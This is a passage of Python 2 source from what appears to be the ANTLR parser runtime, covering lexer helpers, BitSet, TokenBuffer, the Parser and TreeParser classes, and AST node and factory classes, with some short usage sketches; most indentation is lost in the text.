self.inputState.tokenStartColumn = self.inputState.column
self.inputState.tokenStartLine = self.inputState.line
def rewind(self,pos) :
self.inputState.input.rewind(pos)
def setTokenObjectClass(self,cl):
self.tokenClass = cl
def testForLiteral(self,token):
if not token:
return
assert isinstance(token,Token)
_type = token.getType()
## special tokens can't be literals
if _type in [SKIP,INVALID_TYPE,EOF_TYPE,NULL_TREE_LOOKAHEAD] :
return
_text = token.getText()
if not _text:
return
assert is_string_type(_text)
_type = self.testLiteralsTable(_text,_type)
token.setType(_type)
return _type
def testLiteralsTable(self,*args):
if is_string_type(args[0]):
s = args[0]
i = args[1]
else:
s = self.text.getString()
i = args[0]
## check whether an integer has been given
assert isinstance(i,int)
## check whether we have a dict
assert isinstance(self.literals,dict)
try:
## E0010
if not self.caseSensitiveLiterals:
s = s.__class__.lower(s)
i = self.literals[s]
except KeyError:
pass
return i
def toLower(self,c):
return c.__class__.lower(c)
def traceIndent(self):
print ' ' * self.traceDepth
def traceIn(self,rname):
self.traceDepth += 1
self.traceIndent()
print "> lexer %s c== %s" % (rname,self.LA(1))
def traceOut(self,rname):
self.traceIndent()
print "< lexer %s c== %s" % (rname,self.LA(1))
self.traceDepth -= 1
def uponEOF(self):
pass
def append(self,c):
if self.saveConsumedInput :
self.text.append(c)
def commit(self):
self.inputState.input.commit()
def consume(self):
if not self.inputState.guessing:
c = self.LA(1)
if self.caseSensitive:
self.append(c)
else:
# use input.LA(), not LA(), to get original case
# CharScanner.LA() would toLower it.
c = self.inputState.input.LA(1)
self.append(c)
if c and c in "\t":
self.tab()
else:
self.inputState.column += 1
self.inputState.input.consume()
## Consume chars until one matches the given char
def consumeUntil_char(self,c):
while self.LA(1) != EOF_CHAR and self.LA(1) != c:
self.consume()
## Consume chars until one matches the given set
def consumeUntil_bitset(self,bitset):
while self.LA(1) != EOF_CHAR and not bitset.member(self.LA(1)):
self.consume()
### If symbol seen is EOF then generate and set token, otherwise
### throw exception.
def default(self,la1):
if not la1 :
self.uponEOF()
self._returnToken = self.makeToken(EOF_TYPE)
else:
self.raise_NoViableAlt(la1)
def filterdefault(self,la1,*args):
if not la1:
self.uponEOF()
self._returnToken = self.makeToken(EOF_TYPE)
return
if not args:
self.consume()
raise TryAgain()
else:
### apply filter object
self.commit()
try:
func=args[0]
args=args[1:]
func(*args)
except RecognitionException, e:
## catastrophic failure
self.reportError(e)
self.consume()
raise TryAgain()
def raise_NoViableAlt(self,la1=None):
if not la1: la1 = self.LA(1)
fname = self.getFilename()
line = self.getLine()
col = self.getColumn()
raise NoViableAltForCharException(la1,fname,line,col)
def set_return_token(self,_create,_token,_ttype,_offset):
if _create and not _token and (not _ttype == SKIP):
string = self.text.getString(_offset)
_token = self.makeToken(_ttype)
_token.setText(string)
self._returnToken = _token
return _token
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### CharScannerIterator ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class CharScannerIterator:
def __init__(self,inst):
if isinstance(inst,CharScanner):
self.inst = inst
return
raise TypeError("CharScannerIterator requires CharScanner object")
def next(self):
assert self.inst
item = self.inst.nextToken()
if not item or item.isEOF():
raise StopIteration()
return item
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### BitSet ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### I'm assuming here that a long is 64 bits. In Python, however, a
### long has arbitrary precision, so a single long could in principle
### hold the whole bitset; Python would then do almost all the work (TBD).
class BitSet(object):
BITS = 64
NIBBLE = 4
LOG_BITS = 6
MOD_MASK = BITS -1
def __init__(self,data=None):
if not data:
BitSet.__init__(self,[long(0)])
return
if isinstance(data,int):
BitSet.__init__(self,[long(data)])
return
if isinstance(data,long):
BitSet.__init__(self,[data])
return
if not isinstance(data,list):
raise TypeError("BitSet requires integer, long, or " +
"list argument")
for x in data:
if not isinstance(x,long):
raise TypeError(self,"List argument item is " +
"not a long: %s" % (x))
self.data = data
def __str__(self):
bits = len(self.data) * BitSet.BITS
s = ""
for i in xrange(0,bits):
if self.at(i):
s += "1"
else:
s += "o"
if not ((i+1) % 10):
s += '|%s|' % (i+1)
return s
def __repr__(self):
return str(self)
def member(self,item):
if not item:
return False
if isinstance(item,int):
return self.at(item)
if not is_string_type(item):
raise TypeError(self,"char or unichar expected: %s" % (item))
## char is a (unicode) string of length at most 1, ie.
## a char.
if len(item) != 1:
raise TypeError(self,"char expected: %s" % (item))
### handle ASCII/UNICODE char
num = ord(item)
### check whether position num is in bitset
return self.at(num)
def wordNumber(self,bit):
return bit >> BitSet.LOG_BITS
def bitMask(self,bit):
pos = bit & BitSet.MOD_MASK ## bit mod BITS
return (1L << pos)
def set(self,bit,on=True):
# grow bitset as required (use with care!)
i = self.wordNumber(bit)
mask = self.bitMask(bit)
if i>=len(self.data):
d = i - len(self.data) + 1
for x in xrange(0,d):
self.data.append(0L)
assert len(self.data) == i+1
if on:
self.data[i] |= mask
else:
self.data[i] &= (~mask)
### make add an alias for set
add = set
def off(self,bit,off=True):
self.set(bit,not off)
def at(self,bit):
i = self.wordNumber(bit)
v = self.data[i]
m = self.bitMask(bit)
return v & m
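## Hypothetical usage sketch, not part of the ANTLR runtime: bits are
## packed into 64-bit words and member() accepts either an int or a
## 1-char string.
if __name__ == '__main__':
    b = BitSet()
    b.add(ord('a'))
    b.add(ord('b'))
    assert b.member('a')
    assert b.member(ord('b'))
    assert not b.member('c')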
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### some further funcs ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
def illegalarg_ex(func):
raise ValueError(
"%s is only valid if parser is built for debugging" %
(func.func_name))
def runtime_ex(func):
raise RuntimeError(
"%s is only valid if parser is built for debugging" %
(func.func_name))
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### TokenBuffer ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class TokenBuffer(object):
def __init__(self,stream):
self.input = stream
self.nMarkers = 0
self.markerOffset = 0
self.numToConsume = 0
self.queue = Queue()
def reset(self) :
self.nMarkers = 0
self.markerOffset = 0
self.numToConsume = 0
self.queue.reset()
def consume(self) :
self.numToConsume += 1
def fill(self, amount):
self.syncConsume()
while self.queue.length() < (amount + self.markerOffset):
self.queue.append(self.input.nextToken())
def getInput(self):
return self.input
def LA(self,k) :
self.fill(k)
return self.queue.elementAt(self.markerOffset + k - 1).type
def LT(self,k) :
self.fill(k)
return self.queue.elementAt(self.markerOffset + k - 1)
def mark(self) :
self.syncConsume()
self.nMarkers += 1
return self.markerOffset
def rewind(self,mark) :
self.syncConsume()
self.markerOffset = mark
self.nMarkers -= 1
def syncConsume(self) :
while self.numToConsume > 0:
if self.nMarkers > 0:
# guess mode -- leave leading characters and bump offset.
self.markerOffset += 1
else:
# normal mode -- remove first character
self.queue.removeFirst()
self.numToConsume -= 1
def __str__(self):
return "(%s,%s,%s,%s,%s)" % (
self.input,
self.nMarkers,
self.markerOffset,
self.numToConsume,
self.queue)
def __repr__(self):
return str(self)
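## Hypothetical usage sketch, not part of the ANTLR runtime: k-token
## lookahead over a TokenStream (reuses _ListTokenStream from the
## TokenStreamSelector sketch above).
if __name__ == '__main__':
    tb = TokenBuffer(_ListTokenStream(
        [CommonToken(type=MIN_USER_TYPE, text="x"),
         CommonToken(type=MIN_USER_TYPE + 1, text="y")]))
    assert tb.LA(1) == MIN_USER_TYPE   # type of the next token
    assert tb.LT(2).getText() == "y"   # whole token, two ahead
    tb.consume()
    assert tb.LA(1) == MIN_USER_TYPE + 1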
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### ParserSharedInputState ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class ParserSharedInputState(object):
def __init__(self):
self.input = None
self.reset()
def reset(self):
self.guessing = 0
self.filename = None
if self.input:
self.input.reset()
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### Parser ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class Parser(object):
def __init__(self, *args, **kwargs):
self.tokenNames = None
self.returnAST = None
self.astFactory = None
self.tokenTypeToASTClassMap = {}
self.ignoreInvalidDebugCalls = False
self.traceDepth = 0
if not args:
self.inputState = ParserSharedInputState()
return
arg0 = args[0]
assert isinstance(arg0,ParserSharedInputState)
self.inputState = arg0
return
def getTokenTypeToASTClassMap(self):
return self.tokenTypeToASTClassMap
def addMessageListener(self, l):
if not self.ignoreInvalidDebugCalls:
illegalarg_ex(self.addMessageListener)
def addParserListener(self, l):
if not self.ignoreInvalidDebugCalls:
illegalarg_ex(self.addParserListener)
def addParserMatchListener(self, l):
if not self.ignoreInvalidDebugCalls:
illegalarg_ex(self.addParserMatchListener)
def addParserTokenListener(self, l):
if not self.ignoreInvalidDebugCalls:
illegalarg_ex(self.addParserTokenListener)
def addSemanticPredicateListener(self, l):
if not self.ignoreInvalidDebugCalls:
illegalarg_ex(self.addSemanticPredicateListener)
def addSyntacticPredicateListener(self, l):
if not self.ignoreInvalidDebugCalls:
illegalarg_ex(self.addSyntacticPredicateListener)
def addTraceListener(self, l):
if not self.ignoreInvalidDebugCalls:
illegalarg_ex(self.addTraceListener)
def consume(self):
raise NotImplementedError()
def _consumeUntil_type(self,tokenType):
while self.LA(1) != EOF_TYPE and self.LA(1) != tokenType:
self.consume()
def _consumeUntil_bitset(self, set):
while self.LA(1) != EOF_TYPE and not set.member(self.LA(1)):
self.consume()
def consumeUntil(self,arg):
if isinstance(arg,int):
self._consumeUntil_type(arg)
else:
self._consumeUntil_bitset(arg)
def defaultDebuggingSetup(self):
pass
def getAST(self) :
return self.returnAST
def getASTFactory(self) :
return self.astFactory
def getFilename(self) :
return self.inputState.filename
def getInputState(self) :
return self.inputState
def setInputState(self, state) :
self.inputState = state
def getTokenName(self,num) :
return self.tokenNames[num]
def getTokenNames(self) :
return self.tokenNames
def isDebugMode(self) :
return False
def LA(self, i):
raise NotImplementedError()
def LT(self, i):
raise NotImplementedError()
def mark(self):
return self.inputState.input.mark()
def _match_int(self,t):
if (self.LA(1) != t):
raise MismatchedTokenException(
self.tokenNames, self.LT(1), t, False, self.getFilename())
else:
self.consume()
def _match_set(self, b):
if (not b.member(self.LA(1))):
raise MismatchedTokenException(
self.tokenNames,self.LT(1), b, False, self.getFilename())
else:
self.consume()
def match(self,set) :
if isinstance(set,int):
self._match_int(set)
return
if isinstance(set,BitSet):
self._match_set(set)
return
raise TypeError("Parser.match requires integer ot BitSet argument")
def matchNot(self,t):
if self.LA(1) == t:
raise MismatchedTokenException(
self.tokenNames, self.LT(1), t, True, self.getFilename())
else:
self.consume()
def removeMessageListener(self, l):
if not self.ignoreInvalidDebugCalls:
runtime_ex(self.removeMessageListener)
def removeParserListener(self, l):
if not self.ignoreInvalidDebugCalls:
runtime_ex(self.removeParserListener)
def removeParserMatchListener(self, l):
if not self.ignoreInvalidDebugCalls:
runtime_ex(self.removeParserMatchListener)
def removeParserTokenListener(self, l):
if not self.ignoreInvalidDebugCalls:
runtime_ex(self.removeParserTokenListener)
def removeSemanticPredicateListener(self, l):
if not self.ignoreInvalidDebugCalls:
runtime_ex(self.removeSemanticPredicateListener)
def removeSyntacticPredicateListener(self, l):
if not self.ignoreInvalidDebugCalls:
runtime_ex(self.removeSyntacticPredicateListener)
def removeTraceListener(self, l):
if not self.ignoreInvalidDebugCalls:
runtime_ex(self.removeTraceListener)
def reportError(self,x) :
fmt = "syntax error:"
f = self.getFilename()
if f:
fmt = ("%s:" % f) + fmt
if isinstance(x,Token):
line = x.getLine()
col = x.getColumn()
text = x.getText()
fmt = fmt + 'unexpected symbol at line %s (column %s): "%s"'
print >>sys.stderr, fmt % (line,col,text)
else:
print >>sys.stderr, fmt,str(x)
def reportWarning(self,s):
f = self.getFilename()
if f:
print "%s:warning: %s" % (f,str(s))
else:
print "warning: %s" % (str(s))
def rewind(self, pos) :
self.inputState.input.rewind(pos)
def setASTFactory(self, f) :
self.astFactory = f
def setASTNodeClass(self, cl) :
self.astFactory.setASTNodeType(cl)
def setASTNodeType(self, nodeType) :
self.setASTNodeClass(nodeType)
def setDebugMode(self, debugMode) :
if (not self.ignoreInvalidDebugCalls):
runtime_ex(self.setDebugMode)
def setFilename(self, f) :
self.inputState.filename = f
def setIgnoreInvalidDebugCalls(self, value) :
self.ignoreInvalidDebugCalls = value
def setTokenBuffer(self, t) :
self.inputState.input = t
def traceIndent(self):
print " " * self.traceDepth
def traceIn(self,rname):
self.traceDepth += 1
self.trace("> ", rname)
def traceOut(self,rname):
self.trace("< ", rname)
self.traceDepth -= 1
### wh: moved from ASTFactory to Parser
def addASTChild(self,currentAST, child):
if not child:
return
if not currentAST.root:
currentAST.root = child
elif not currentAST.child:
currentAST.root.setFirstChild(child)
else:
currentAST.child.setNextSibling(child)
currentAST.child = child
currentAST.advanceChildToEnd()
### wh: moved from ASTFactory to Parser
def makeASTRoot(self,currentAST,root) :
if root:
### Add the current root as a child of new root
root.addChild(currentAST.root)
### The new current child is the last sibling of the old root
currentAST.child = currentAST.root
currentAST.advanceChildToEnd()
### Set the new root
currentAST.root = root
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### LLkParser ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class LLkParser(Parser):
def __init__(self, *args, **kwargs):
try:
arg1 = args[0]
except IndexError:
arg1 = 1
if isinstance(arg1,int):
super(LLkParser,self).__init__()
self.k = arg1
return
if isinstance(arg1,ParserSharedInputState):
super(LLkParser,self).__init__(arg1)
self.set_k(1,*args)
return
if isinstance(arg1,TokenBuffer):
super(LLkParser,self).__init__()
self.setTokenBuffer(arg1)
self.set_k(1,*args)
return
if isinstance(arg1,TokenStream):
super(LLkParser,self).__init__()
tokenBuf = TokenBuffer(arg1)
self.setTokenBuffer(tokenBuf)
self.set_k(1,*args)
return
### unknown argument
raise TypeError("LLkParser requires integer, " +
"ParserSharedInputStream or TokenStream argument")
def consume(self):
self.inputState.input.consume()
def LA(self,i):
return self.inputState.input.LA(i)
def LT(self,i):
return self.inputState.input.LT(i)
def set_k(self,index,*args):
try:
self.k = args[index]
except IndexError:
self.k = 1
def trace(self,ee,rname):
self.traceIndent()
guess = ""
if self.inputState.guessing > 0:
guess = " [guessing]"
print(ee + rname + guess)
for i in xrange(1,self.k+1):
if i != 1:
print(", ")
if self.LT(i) :
v = self.LT(i).getText()
else:
v = "null"
print "LA(%s) == %s" % (i,v)
print("\n")
def traceIn(self,rname):
self.traceDepth += 1
self.trace("> ", rname)
def traceOut(self,rname):
self.trace("< ", rname)
self.traceDepth -= 1
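## Hypothetical usage sketch, not part of the ANTLR runtime: driving
## LLkParser.match()/LA() by hand over _ListTokenStream (defined after
## TokenStreamSelector above); generated parsers do the same internally.
if __name__ == '__main__':
    p = LLkParser(_ListTokenStream([CommonToken(type=MIN_USER_TYPE)]))
    assert p.LA(1) == MIN_USER_TYPE
    p.match(MIN_USER_TYPE)        # consumes the expected token
    assert p.LA(1) == EOF_TYPE    # buffer now yields EOF tokens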
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### TreeParserSharedInputState ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class TreeParserSharedInputState(object):
def __init__(self):
self.guessing = 0
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### TreeParser ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class TreeParser(object):
def __init__(self, *args, **kwargs):
self.inputState = TreeParserSharedInputState()
self._retTree = None
self.tokenNames = []
self.returnAST = None
self.astFactory = ASTFactory()
self.traceDepth = 0
def getAST(self):
return self.returnAST
def getASTFactory(self):
return self.astFactory
def getTokenName(self,num) :
return self.tokenNames[num]
def getTokenNames(self):
return self.tokenNames
def match(self,t,set) :
assert isinstance(set,int) or isinstance(set,BitSet)
if not t or t == ASTNULL:
raise MismatchedTokenException(self.getTokenNames(), t,set, False)
if isinstance(set,int) and t.getType() != set:
raise MismatchedTokenException(self.getTokenNames(), t,set, False)
if isinstance(set,BitSet) and not set.member(t.getType()):
raise MismatchedTokenException(self.getTokenNames(), t,set, False)
def matchNot(self,t, ttype) :
if not t or (t == ASTNULL) or (t.getType() == ttype):
raise MismatchedTokenException(self.getTokenNames(), t, ttype, True)
def reportError(self,ex):
print >>sys.stderr,"error:",ex
def reportWarning(self, s):
print "warning:",s
def setASTFactory(self,f):
self.astFactory = f
def setASTNodeType(self,nodeType):
self.setASTNodeClass(nodeType)
def setASTNodeClass(self,nodeType):
self.astFactory.setASTNodeType(nodeType)
def traceIndent(self):
print " " * self.traceDepth
def traceIn(self,rname,t):
self.traceDepth += 1
self.traceIndent()
print("> " + rname + "(" +
ifelse(t,str(t),"null") + ")" +
ifelse(self.inputState.guessing>0,"[guessing]",""))
def traceOut(self,rname,t):
self.traceIndent()
print("< " + rname + "(" +
ifelse(t,str(t),"null") + ")" +
ifelse(self.inputState.guessing>0,"[guessing]",""))
self.traceDepth -= 1
### wh: moved from ASTFactory to TreeParser
def addASTChild(self,currentAST, child):
if not child:
return
if not currentAST.root:
currentAST.root = child
elif not currentAST.child:
currentAST.root.setFirstChild(child)
else:
currentAST.child.setNextSibling(child)
currentAST.child = child
currentAST.advanceChildToEnd()
### wh: moved from ASTFactory to TreeParser
def makeASTRoot(self,currentAST,root):
if root:
### Add the current root as a child of new root
root.addChild(currentAST.root)
### The new current child is the last sibling of the old root
currentAST.child = currentAST.root
currentAST.advanceChildToEnd()
### Set the new root
currentAST.root = root
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### funcs to work on trees ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
def rightmost(ast):
if ast:
while(ast.right):
ast = ast.right
return ast
def cmptree(s,t,partial):
while(s and t):
### as a quick optimization, check roots first.
if not s.equals(t):
return False
### if roots match, do full list match test on children.
if not cmptree(s.getFirstChild(),t.getFirstChild(),partial):
return False
s = s.getNextSibling()
t = t.getNextSibling()
r = ifelse(partial,not t,not s and not t)
return r
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### AST ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class AST(object):
def __init__(self):
pass
def addChild(self, c):
pass
def equals(self, t):
return False
def equalsList(self, t):
return False
def equalsListPartial(self, t):
return False
def equalsTree(self, t):
return False
def equalsTreePartial(self, t):
return False
def findAll(self, tree):
return None
def findAllPartial(self, subtree):
return None
def getFirstChild(self):
return self
def getNextSibling(self):
return self
def getText(self):
return ""
def getType(self):
return INVALID_TYPE
def getLine(self):
return 0
def getColumn(self):
return 0
def getNumberOfChildren(self):
return 0
def initialize(self, t, txt=None):
pass
def setFirstChild(self, c):
pass
def setNextSibling(self, n):
pass
def setText(self, text):
pass
def setType(self, ttype):
pass
def toString(self):
return self.getText()
__str__ = toString
def toStringList(self):
return self.getText()
def toStringTree(self):
return self.getText()
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### ASTNULLType ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### There is only one instance of this class.
class ASTNULLType(AST):
def __init__(self):
AST.__init__(self)
pass
def getText(self):
return "<ASTNULL>"
def getType(self):
return NULL_TREE_LOOKAHEAD
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### BaseAST ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class BaseAST(AST):
verboseStringConversion = False
tokenNames = None
def __init__(self):
self.down = None ## kid
self.right = None ## sibling
def addChild(self,node):
if node:
t = rightmost(self.down)
if t:
t.right = node
else:
assert not self.down
self.down = node
def getNumberOfChildren(self):
t = self.down
n = 0
while t:
n += 1
t = t.right
return n
def doWorkForFindAll(self,v,target,partialMatch):
sibling = self
while sibling:
c1 = partialMatch and sibling.equalsTreePartial(target)
if c1:
v.append(sibling)
else:
c2 = not partialMatch and sibling.equalsTree(target)
if c2:
v.append(sibling)
### regardless of match or not, check any children for matches
if sibling.getFirstChild():
sibling.getFirstChild().doWorkForFindAll(v,target,partialMatch)
sibling = sibling.getNextSibling()
### Is node t equal to 'self' in terms of token type and text?
def equals(self,t):
if not t:
return False
return self.getText() == t.getText() and self.getType() == t.getType()
### Is t an exact structural and equals() match of this tree. The
### 'self' reference is considered the start of a sibling list.
###
def equalsList(self, t):
return cmptree(self, t, partial=False)
### Is 't' a subtree of this list?
### The siblings of the root are NOT ignored.
###
def equalsListPartial(self,t):
return cmptree(self,t,partial=True)
### Is tree rooted at 'self' equal to 't'? The siblings
### of 'self' are ignored.
###
def equalsTree(self, t):
return self.equals(t) and \
cmptree(self.getFirstChild(), t.getFirstChild(), partial=False)
### Is 't' a subtree of the tree rooted at 'self'? The siblings
### of 'self' are ignored.
###
def equalsTreePartial(self, t):
if not t:
return True
return self.equals(t) and cmptree(
self.getFirstChild(), t.getFirstChild(), partial=True)
### Walk the tree looking for all exact subtree matches. Return
### an ASTEnumerator that lets the caller walk the list
### of subtree roots found herein.
def findAll(self,target):
roots = []
### the empty tree cannot result in an enumeration
if not target:
return None
# find all matches recursively
self.doWorkForFindAll(roots, target, False)
return roots
### Walk the tree looking for all subtrees. Return
### an ASTEnumerator that lets the caller walk the list
### of subtree roots found herein.
def findAllPartial(self,sub):
roots = []
### the empty tree cannot result in an enumeration
if not sub:
return None
self.doWorkForFindAll(roots, sub, True) ### find all matches recursively
return roots
### Get the first child of this node; None if there are no children
def getFirstChild(self):
return self.down
### Get the next sibling in line after this one
def getNextSibling(self):
return self.right
### Get the token text for this node
def getText(self):
return ""
### Get the token type for this node
def getType(self):
return 0
def getLine(self):
return 0
def getColumn(self):
return 0
### Remove all children
def removeChildren(self):
self.down = None
def setFirstChild(self,c):
self.down = c
def setNextSibling(self, n):
self.right = n
### Set the token text for this node
def setText(self, text):
pass
### Set the token type for this node
def setType(self, ttype):
pass
### static
def setVerboseStringConversion(verbose,names):
BaseAST.verboseStringConversion = verbose
BaseAST.tokenNames = names
setVerboseStringConversion = staticmethod(setVerboseStringConversion)
### Return an array of strings that maps token ID to its text.
## @since 2.7.3
def getTokenNames():
return BaseAST.tokenNames
getTokenNames = staticmethod(getTokenNames)
def toString(self):
return self.getText()
### return tree as lisp string - sibling included
def toStringList(self):
ts = self.toStringTree()
sib = self.getNextSibling()
if sib:
ts += sib.toStringList()
return ts
__str__ = toStringList
### return tree as string - siblings ignored
def toStringTree(self):
ts = ""
kid = self.getFirstChild()
if kid:
ts += " ("
ts += " " + self.toString()
if kid:
ts += kid.toStringList()
ts += " )"
return ts
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### CommonAST ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### Common AST node implementation
class CommonAST(BaseAST):
def __init__(self,token=None):
super(CommonAST,self).__init__()
self.ttype = INVALID_TYPE
self.text = "<no text>"
self.line = 0
self.column= 0
self.initialize(token)
#assert self.text
### Get the token text for this node
def getText(self):
return self.text
### Get the token type for this node
def getType(self):
return self.ttype
### Get the line for this node
def getLine(self):
return self.line
### Get the column for this node
def getColumn(self):
return self.column
def initialize(self,*args):
if not args:
return
arg0 = args[0]
if isinstance(arg0,int):
arg1 = args[1]
self.setType(arg0)
self.setText(arg1)
return
if isinstance(arg0,AST) or isinstance(arg0,Token):
self.setText(arg0.getText())
self.setType(arg0.getType())
self.line = arg0.getLine()
self.column = arg0.getColumn()
return
### Set the token text for this node
def setText(self,text_):
assert is_string_type(text_)
self.text = text_
### Set the token type for this node
def setType(self,ttype_):
assert isinstance(ttype_,int)
self.ttype = ttype_
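## Hypothetical usage sketch, not part of the ANTLR runtime: building
## the tree (+ 1 2) by hand and checking its lisp form.
if __name__ == '__main__':
    plus = CommonAST()
    plus.initialize(MIN_USER_TYPE, "+")
    one = CommonAST()
    one.initialize(MIN_USER_TYPE, "1")
    two = CommonAST()
    two.initialize(MIN_USER_TYPE, "2")
    plus.addChild(one)
    plus.addChild(two)
    assert plus.getNumberOfChildren() == 2
    assert plus.toStringTree() == " ( + 1 2 )"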
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### CommonASTWithHiddenTokens ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class CommonASTWithHiddenTokens(CommonAST):
def __init__(self,*args):
CommonAST.__init__(self,*args)
self.hiddenBefore = None
self.hiddenAfter = None
def getHiddenAfter(self):
return self.hiddenAfter
def getHiddenBefore(self):
return self.hiddenBefore
def initialize(self,*args):
CommonAST.initialize(self,*args)
if args and isinstance(args[0],Token):
assert isinstance(args[0],CommonHiddenStreamToken)
self.hiddenBefore = args[0].getHiddenBefore()
self.hiddenAfter = args[0].getHiddenAfter()
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### ASTPair ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class ASTPair(object):
def __init__(self):
self.root = None ### current root of tree
self.child = None ### current child to which siblings are added
    ### Make sure that child is the last sibling
def advanceChildToEnd(self):
if self.child:
while self.child.getNextSibling():
self.child = self.child.getNextSibling()
    ### Copy an ASTPair. Don't call it clone() because we want type-safety
def copy(self):
tmp = ASTPair()
tmp.root = self.root
tmp.child = self.child
return tmp
    def toString(self):
        r = ifelse(not self.root, "null", self.root.getText())
        c = ifelse(not self.child, "null", self.child.getText())
        return "[%s,%s]" % (r, c)
__str__ = toString
__repr__ = toString
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
### ASTFactory ###
###xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx###
class ASTFactory(object):
def __init__(self,table=None):
self._class = None
self._classmap = ifelse(table,table,None)
def create(self,*args):
if not args:
return self.create(INVALID_TYPE)
arg0 = args[0]
arg1 = None
arg2 = None
try:
arg1 = args[1]
arg2 = args[2]
        except IndexError:
pass
# ctor(int)
if isinstance(arg0,int) and not arg2:
### get class for 'self' type
c = self.getASTNodeType(arg0)
t = self.create(c)
if t:
t.initialize(arg0, ifelse(arg1,arg1,""))
return t
# ctor(int,something)
if isinstance(arg0,int) and arg2:
t = self.create(arg2)
if t:
t.initialize(arg0,arg1)
return t
# ctor(AST)
if isinstance(arg0,AST):
t = self.create(arg0.getType())
if t:
t.initialize(arg0)
return t
# ctor(token)
if isinstance(arg0,Token) and not arg1:
ttype = arg0.getType()
assert isinstance(ttype,int)
t = self.create(ttype)
if t:
t.initialize(arg0)
return t
# ctor(token,class)
if isinstance(arg0,Token) and arg1:
assert isinstance(arg1,type)
assert issubclass(arg1,AST)
# this creates instance of 'arg1' using 'arg0' as
# argument. Wow, that's magic!
t = arg1(arg0)
assert t and isinstance(t,AST)
return t
# ctor(class)
if isinstance(arg0,type):
### next statement creates instance of type (!)
t = arg0()
assert isinstance(t,AST)
return t
def setASTNodeClass(self,className=None):
if not className:
return
assert isinstance(className,type)
assert issubclass(className,AST)
self._class = className
### kind of misnomer - use setASTNodeClass instead.
setASTNodeType = setASTNodeClass
def getASTNodeClass(self):
return self._class
def getTokenTypeToASTClassMap(self):
return self._classmap
def setTokenTypeToASTClassMap(self,amap):
self._classmap = amap
def error(self, e):
import sys
print >> sys.stderr, e
def setTokenTypeASTNodeType(self, tokenType, className):
"""
Specify a mapping between a token type and a (AST) class.
"""
if not self._classmap:
self._classmap = {}
if not className:
try:
del self._classmap[tokenType]
            except KeyError:
pass
else:
### here we should also perform actions to ensure that
### a. class can be loaded
### b. class is a subclass of AST
###
assert isinstance(className,type)
assert issubclass(className,AST) ## a & b
